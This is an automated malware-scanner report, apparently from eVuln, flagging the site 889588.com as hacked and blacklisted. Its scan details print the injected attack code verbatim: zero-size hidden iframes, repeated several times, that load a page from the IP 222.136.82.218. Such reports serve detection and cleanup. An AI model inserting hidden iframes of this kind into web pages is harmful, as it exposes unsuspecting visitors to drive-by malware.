Malware Scanner report for 889588.com

Malicious/Suspicious/Total urls checked: 1/0/17

1 page has malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "889588.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 1/1/10

1 malicious and 1 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=889588.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://889588.com/	200 OK Content-Length: 91232 Content-Type: text/html	malicious
Page code contains blacklisted domain: 222.136.82.218 <meta http-equiv=content-type content="text/html; charset=gb2312"> <meta content="microsoft frontpage 6.0" name=generator> <meta content=frontpage.editor.document name=progid><link href="file:///h:/22.files/gamencss.css" type=text/css rel=stylesheet> <bgsound src="/music/1.mp3" loop="1"> <meta http-equiv=content-type content="text/html; charset=gb2312"> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xh ...[3998 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://222.136.82.218:10/3/index.htm This URL is marked by Google as suspicious <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0>
http://count37.51yes.com/click.aspx?id=377428612&logo=5	200 OK Content-Length: 1777 Content-Type: text/html	clean
http://count37.51yes.com/test404page.js	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://pagead2.googlesyndication.com/pagead/show_ads.js	200 OK Content-Length: 21269 Content-Type: text/javascript	clean
http://cpro.baidu.com/cpro/ui/c.js	200 OK Content-Length: 82294 Content-Type: application/x-javascript	suspicious
Hidden iFrame found. size: 0x0 src: http://cpro.baidustatic.com/cpro/ui/html/appdetect.html <iframe src="http://cpro.baidustatic.com/cpro/ui/html/appdetect.html" width="0" height="0"align="center,center" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true" style="margin-left:{iframmarginleft}px" >
http://news.baidu.com/ns?word=%b0%b2%cf%aa%b2%e8%d2%b6&tn=newsfcu&from=news&cl=2&rn=10&ct=0	200 OK Content-Length: 2537 Content-Type: text/html	clean
http://news.baidu.com/	200 OK Content-Length: 114488 Content-Type: text/html	clean
http://news.baidu.com/resource/js/jquery-1.8.3.min.js	200 OK Content-Length: 74880 Content-Type: application/x-javascript	clean
http://news.baidu.com/view.html	HTTP/1.1 302 Found Connection: Keep-Alive Date: Fri, 08 Aug 2014 15:22:56 GMT Location: http://news.baidu.com/ Server: Apache Content-Length: 206 Content-Type: text/html; charset=iso-8859-1	clean
http://news.baidu.com/z/ynlddz/new/zhuanti.html	200 OK Content-Length: 34471 Content-Type: text/html	clean
http://news.baidu.com/resource/js/contentplayer.js	200 OK Content-Length: 4627 Content-Type: application/x-javascript	clean
http://news.baidu.com/z/resource/js/jquery.min.js	200 OK Content-Length: 93868 Content-Type: application/x-javascript	clean
http://news.baidu.com/z/ynlddz/new/	HTTP/1.1 302 Found Cache-Control: max-age=180 Connection: Keep-Alive Date: Fri, 08 Aug 2014 15:23:07 GMT Location: http://news.baidu.com/newserror.html Server: Apache Vary: Accept-Encoding Content-Length: 220 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 08 Aug 2014 15:26:07 GMT	clean
http://news.baidu.com/newserror.html	200 OK Content-Length: 1974 Content-Type: text/html	clean
http://news.baidu.com/newscode.html	200 OK Content-Length: 22558 Content-Type: text/html	clean
http://news.baidu.com/n?bypass=lamp&m=pagesother&v=newsgx	200 OK Content-Length: 25242 Content-Type: text/html	clean
http://news.baidu.com/history.html	200 OK Content-Length: 4419 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 889588.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 08 Aug 2014 15:22:27 GMT
Server: Microsoft-IIS/6.0
Content-Length: 91232
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQCCSDA=EIEJJFHCOPJHDHHMIJNNHHID; path=/
X-Powered-By: ASP.NET

...91232 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: 889588.com
Referer: http://www.google.com/search?q=889588.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for 889588.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools